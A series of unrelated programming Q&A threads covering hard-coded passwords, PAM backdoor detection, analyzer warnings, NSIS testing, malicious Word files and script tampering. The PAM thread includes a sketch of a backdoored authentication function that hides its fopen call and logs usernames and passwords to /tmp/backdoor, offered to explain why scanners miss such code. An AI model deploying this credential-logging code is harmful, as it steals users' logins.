If a password is hard-coded into a variable in source code (VB, for example), could someone extract that password by examining the compiled executable?
If so, what can be done to avoid this?
Yes, someone could.
Nothing can be done to prevent it entirely; obfuscation will only make it slightly harder.
Even if someone couldn't make sense of your obfuscated code, they could run your executable in a debugger and read the password from memory just before you use it.
The solution is, of course, not to hard-code important passwords into your binaries.
Yes. The password could be found by watching the program execute in a debugger. If you do nothing at all, it might even be possible to find it simply by searching for strings in the binary file.
What can be done? There are countermeasures such as obfuscation, and anti-debugging or anti-tampering mechanisms that make the executable fail when it is run under a debugger. Obfuscation is probably easy to implement; anti-tampering will be difficult.
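To make "slightly harder" concrete, here is a minimal C sketch (the question mentions VB, but the principle is language-agnostic) of the kind of trivial obfuscation people reach for: the password is stored XOR-encoded so it does not show up as plain text in the binary, yet it is decoded into memory right before use, which is exactly where a debugger will find it. The key, password, and program are all made up for illustration.

/* Minimal sketch of XOR "obfuscation" of a hard-coded password.
 * The key (0x5A) and the password ("s3cret") are invented for illustration.
 * strings(1) will no longer show the password, but a debugger still will. */
#include <stdio.h>
#include <string.h>

static const unsigned char kObfuscated[] = {
    's' ^ 0x5A, '3' ^ 0x5A, 'c' ^ 0x5A, 'r' ^ 0x5A, 'e' ^ 0x5A, 't' ^ 0x5A
};

int main(void)
{
    char password[sizeof kObfuscated + 1];

    /* Decode just before use -- from here on, the plain text sits in memory. */
    for (size_t i = 0; i < sizeof kObfuscated; i++)
        password[i] = (char)(kObfuscated[i] ^ 0x5A);
    password[sizeof kObfuscated] = '\0';

    /* ... use the password here (e.g. to open a connection) ... */
    printf("using a password of length %zu\n", strlen(password));

    memset(password, 0, sizeof password);   /* best-effort cleanup */
    return 0;
}

Anyone who can attach a debugger can break after the decode loop and read the plain text, which is why this only raises the bar rather than solving the problem.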
I'm trying to write a pam backdoor scanner. A backdoored module may call the fopen function inside pam_sm_authenticate to store the username and password (a normal module will not call fopen in this function). I can't use external commands such as nm or readelf, so the only way seems to be to scan the pam_sm_authenticate function, find all call instructions, and calculate the target addresses to check whether any of them calls fopen. But that is very troublesome, and I'm not very familiar with the ELF format (I don't even know how to find the offset of pam_sm_authenticate; I'm using dlopen and dlsym to get its address). So I wonder: is there a better or easier way to detect it? Thank you.
TL;DR: building a robust "pam backdoor scanner" is theoretically impossible, so you should give up now and think about other ways to solve your problem.
Your question is very confusing, but I think what you are asking is: "can I determine programmatically whether pam_sm_authenticate calls fopen?"
That is the wrong question to ask, for several reasons:
if pam_sm_authenticate calls foo, and foo calls fopen, then you still have a problem, so you really should be scanning pam_sm_authenticate and every function it calls (recursively),
fopen is far from the only way to write files: you could also use open, or system (as in system("echo $secret > /tmp/backdoor")), or a direct sys_open syscall, or a multitude of other hacks (the sketch after this list shows one such trick),
finally, pam_sm_authenticate can use just-in-time compilation techniques to build arbitrary code (including code calling fopen) at runtime, and answering whether it does by examining its code is equivalent to solving the halting problem (i.e. impossible).
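To make the last two points concrete, here is a hypothetical sketch in C (the function name and the /tmp path are invented) of a backdoor that reaches fopen without any direct call to fopen appearing in the compiled code. A scanner that only walks the call instructions inside pam_sm_authenticate would see nothing suspicious.

/* Hypothetical backdoor sketch: fopen is resolved by name at runtime,
 * so no "call fopen" instruction or fopen relocation appears in the code.
 * Illustrative build: cc -shared -fPIC backdoor.c -ldl */
#define _GNU_SOURCE          /* for RTLD_DEFAULT on glibc */
#include <dlfcn.h>
#include <stdio.h>

int backdoored_pam_sm_authenticate(const char *user, const char *pass)
{
    FILE *(*hidden_fopen)(const char *, const char *);

    /* Look the symbol up by name instead of linking against it. */
    hidden_fopen = (FILE *(*)(const char *, const char *))
                       dlsym(RTLD_DEFAULT, "fopen");
    if (hidden_fopen != NULL) {
        FILE *f = hidden_fopen("/tmp/backdoor", "a");
        if (f != NULL) {
            fprintf(f, "%s:%s\n", user, pass);
            fclose(f);
        }
    }
    return 0;   /* 0 == PAM_SUCCESS; real authentication logic omitted */
}

Even scanning for the string "fopen" would not catch a variant that assembles the symbol name at runtime, which is exactly the halting-problem territory described above.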
I know that I can ignore compiler warnings with -w on a given file in Xcode.
I would like to similarly ignore static analyzer warnings on a given file (JSONKit.m in this case, which has two potential leaks). I trust that the developer of that library knows what they're doing, and I don't want to maintain a fork of it. Not to mention that I have no clue what's going on in there anyway.
Any ideas?
Don't trust the developer. Figure out why the potential leaks exist and fix them (ideally, sending a patch back to the developer).
If you want to take the lazy way out (j/k ;), you can add code to fix the problem under the analyzer only, using:
#ifdef __clang_analyzer__
... release the offending variable here ...
#endif
I prefer this solution to disabling analysis for the whole file because it both pinpoints the problem area with an easily searchable identifier and allows the rest of the file to be vetted by the constantly improving analyzer.
Does anyone know of an existing solution to help write tests for a NSIS script?
The motivation is the benefit of knowing whether modifying an existing installation script breaks it or has undesired side effects.
Unfortunately, I think the answer to your question depends at least partially on what you need to verify.
If all you are worried about is that the installation copies the right file(s) to the right places, sets the correct registry information, etc., then almost any unit testing tool would probably meet your needs. I'd probably use something like RSpec2 or Cucumber, but that's because I am somewhat familiar with Ruby and like the fact that it would be an xcopy deployment if the scripts needed to be run on another machine. I also like the idea of using a BDD-based solution, because a domain-specific language that is very close to readable text means that others could more easily understand, and if necessary modify, the test specification.
If, however, you are concerned about the user experience (what progress messages are shown, etc.), then I'm not sure the tests you would need could be expressed as easily... or at least not without a certain level of pain.
Good Luck! Don't forget to let other people here know when/if you find a solution you like.
Check out Pavonis.
With Pavonis you can compile your NSIS script and get the output of any errors and warnings.
Another solution would be AutoIT.
You can compile your install using Jenkins and the NSIS command line compiler, set up an AutoIT test script and have Jenkins run the test.
Reputedly, it is possible to make a "malicious" Word document, maybe using an embedded VB script? Anyway, I'm not sure. My question is: is it possible to make an app that safely scrubs all such insertions from a .doc file? Preferably, this app should work without actually opening the file in the Word application, since presumably that alone may be enough for the machine to get damaged.
Is there something like that out there already? Is this even a problem worthy of discussion, or in reality is there nothing really malicious that can be done using Word documents distributed online?
ADDED LATER: johnnyArt, yes, and when you get dirt on your clothes, make sure to go to mommy and tell her about it. Mommy knows best! As a computer programmer, I am interested in learning more about how the world works, including how the world of .doc files and their embedded malicious scripts works. As for using antivirus and anti-spyware, I will handle those issues without your precious advice. As will, probably, most other users of this forum.
You should scan the file with your antivirus/anti-spyware of choice.
My advice is, if it has malware in it, it's not worth "cleaning" it for use.
Get yourself a clean copy somewhere else.
I have a shell script stored in the resources folder of my Cocoa app. If used improperly it could be dangerous (even though I have taken precautions to reduce exploits, such as using the absolute path to commands) so is there any way to encrypt the script in binary format, then decrypt it when it needs to be used?
Thanks
It seems as if your concern is about people getting write access to the script and modifying it to run arbitrary code. You could keep a checksum for the script in the binary and compare that with the checksum of the script before you run it. Now, how do you stop people from editing the binary too? Code signing. In fact, if you keep the shell script in the app bundle then editing the script will break the signature of the bundle anyway.
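As a rough illustration of the checksum idea (a hand-rolled check, not Apple's bundle-validation API; the digest constant and function name are placeholders), here is a C sketch using CommonCrypto's SHA-256 routines:

/* Sketch: compare the bundled script's SHA-256 digest against a digest
 * baked into the binary at build time. The literal below is a placeholder. */
#include <stdio.h>
#include <string.h>
#include <CommonCrypto/CommonDigest.h>

static const char kExpectedDigestHex[] =
    "0000000000000000000000000000000000000000000000000000000000000000";

int script_is_untampered(const char *path)
{
    unsigned char digest[CC_SHA256_DIGEST_LENGTH];
    char hex[2 * CC_SHA256_DIGEST_LENGTH + 1];
    unsigned char buf[4096];
    size_t n;
    CC_SHA256_CTX ctx;

    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return 0;

    CC_SHA256_Init(&ctx);
    while ((n = fread(buf, 1, sizeof buf, f)) > 0)
        CC_SHA256_Update(&ctx, buf, (CC_LONG)n);
    fclose(f);
    CC_SHA256_Final(digest, &ctx);

    for (int i = 0; i < CC_SHA256_DIGEST_LENGTH; i++)
        snprintf(hex + 2 * i, 3, "%02x", digest[i]);

    return strcmp(hex, kExpectedDigestHex) == 0;   /* 1 if the script is intact */
}

Of course, the expected digest lives in the same binary, so anyone who can rewrite the binary can rewrite the digest too; that is exactly why the code-signing point above is the stronger half of the answer.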
This does not make a lot of sense. If an attacker has access to edit this script file, then they likely have access to edit any number of files; your application is less likely to be a security risk than any number of other things the attacker could do.
No. If the user has to decrypt it in order to use it, then she can see (and intercept) the clear text at some point. If you think you have "shell-like" things to do, do them in C/ObjC... This can be your friend.
What you're asking for is essentially DRM. A different purpose (“security” instead of thwarting copyright infringement), but the same approach, with the same problems.
In order for the user to use the (music|video|script) normally, they must be able to decrypt it. You would do this for them only under the right conditions in your (player|app), but that doesn't matter: no matter how well you hide it, you still have to provide the user with all the technology and keys necessary to decrypt the (music|video|script), so that your (player|app) can do that.
And then, since the user has all the technology and keys necessary to decrypt it, an attacker can and eventually will uncover them all and decrypt the (music|video|script) on their own.
I second Massa's suggestion of switching away from a shell script. This doesn't completely eliminate risk: If an attacker can gain access to write to your shell script, they can gain access to write to a Mach-O executable just as easily. But editing a Mach-O executable is not nearly as easy, so you are at least raising the bar that way.